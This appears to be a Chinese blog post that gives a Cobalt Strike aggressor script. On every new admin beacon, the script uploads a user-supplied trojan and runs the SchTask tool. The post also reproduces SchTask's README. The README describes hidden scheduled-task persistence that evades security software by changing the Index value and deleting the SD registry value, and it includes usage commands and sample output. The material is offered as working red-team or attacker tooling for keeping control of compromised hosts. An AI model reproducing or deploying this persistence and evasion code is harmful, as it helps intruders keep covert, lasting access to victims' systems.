简单加个cobalt strike插件

简单加个cobalt strike插件，上线机器自动执行SchTask，麻麻再也不用担心手速不够没法维权了。

上线机器判断是否管理员权限，然后上传目录下的logon.exe到C:\Windows\Temp\，bexecute_assembly参数执行SchTask。

# set up the Initial check
on beacon_initial {
  if (-isadmin $1) {
    bls($1, "C:\\Windows\\Temp\\", &callback);
  }
}

sub callback {
      $flag = "logon.exe";
      if ($flag !isin $3){
        bcd($1, "C:\\Windows\\Temp\\");
        bupload($1, script_resource("logon.exe"));
        bexecute_assembly($1, script_resource("SchTask_donet_v2.exe"), "C:\\Windows\\Temp\\logon.exe 23");
        bexecute_assembly($1, script_resource("SchTask_donet_v4.exe"), "C:\\Windows\\Temp\\logon.exe 23");
      }
    }

注：服务器donet版本，所以同时执行了v2和v4的SchTask，替换CS_InitSchTask目录下的logon.exe为自己的马，cobalt strike中Load InitSchTask.cna插件，或./agscript [host] [port] [user] [password] [/path/to/script.cna]使用。

PS：文件需在同一个目录，例如：

========================================假装我是分割线===================================================

SchTask

类别	说明
作者	AnonySec
团队	0x727 未来一段时间将陆续开源工具
定位	权限维持，内存加载
语言	C#
功能	创建隐藏的计划任务，进行权限维持

什么是 SchTask ?

利用 Windows API，工具化创建隐藏的计划任务，同时绕过安全软件的阻断，达到持久控制。

实现原理 ?

Steps

1. 选择主机随机进程名作为计划任务程序文件名
2. 将计划任务程序文件复制到 %AppData%\Microsoft\Windows\Themes\ 中
3. 创建的计划任务名取同一随机进程名
4. 计划任务触发器以分钟为单位，无限期持续
5. 更改 Index、删除 SD 的键值，隐藏计划任务对应的 XML 文件
6. 删除已添加的计划任务

Articles

更多技术细节，请查看 Windows计划任务的进阶

开始体验

Git下载安装

$ git clone https://github.com/0x727/SchTask_0x727.git

注：直接下载 Release 版本快速使用，已经将 Microsoft.Win32.TaskScheduler.dll 打包到 SchTask.exe 中。

使用方法

SchTask.exe (.NET Framework 2.0)

C:\>SchTask.exe
  ___       _____ ____ _____
 / _ \__  _|___  |___ \___  |
| | | \ \/ /  / /  __)|  / /
| |_| |>  <  / /  / __/ / /     https://github.com/0x727
 \___//_/\_\/_/  |_____/_/      Author: AnonySec

Usage: SchTask.exe <File Path> <Minutes>
   Eg: SchTask.exe C:\Windows\System32\cmd.exe 10

C:\>SchTask.exe C:\Windows\System32\cmd.exe 1
  ___       _____ ____ _____
 / _ \__  _|___  |___ \___  |
| | | \ \/ /  / /  __)|  / /
| |_| |>  <  / /  / __/ / /     https://github.com/0x727
 \___//_/\_\/_/  |_____/_/      Author: AnonySec

[*] Copy File location:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\SearchApp.exe
[*] Hidden task xml file:
C:\Windows\System32\Tasks\Microsoft\Windows\UPnP\SearchApp
[*] RegistryKey location:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UPnP\SearchApp

[+] Successfully add scheduled task !

效果图

为 SchTask 做贡献

SchTask 是一个免费且开源的项目，我们欢迎任何人为其开发和进步贡献力量。

• 在使用过程中出现任何问题，可以通过 issues 来反馈。
• Bug 的修复可以直接提交 Pull Request 到 dev 分支。
• 如果是增加新的功能特性，请先创建一个 issue 并做简单描述以及大致的实现方法，提议被采纳后，就可以创建一个实现新特性的 Pull Request。
• 欢迎对说明文档做出改善，帮助更多的人使用 SchTask，特别是英文文档。
• 贡献代码请提交 PR 至 dev 分支，master 分支仅用于发布稳定可用版本。
• 如果你有任何其他方面的问题或合作，欢迎发送邮件至 [email protected] 。

提醒：和项目相关的问题最好在 issues 中反馈，这样方便其他有类似问题的人可以快速查找解决方法，并且也避免了我们重复回答一些问题。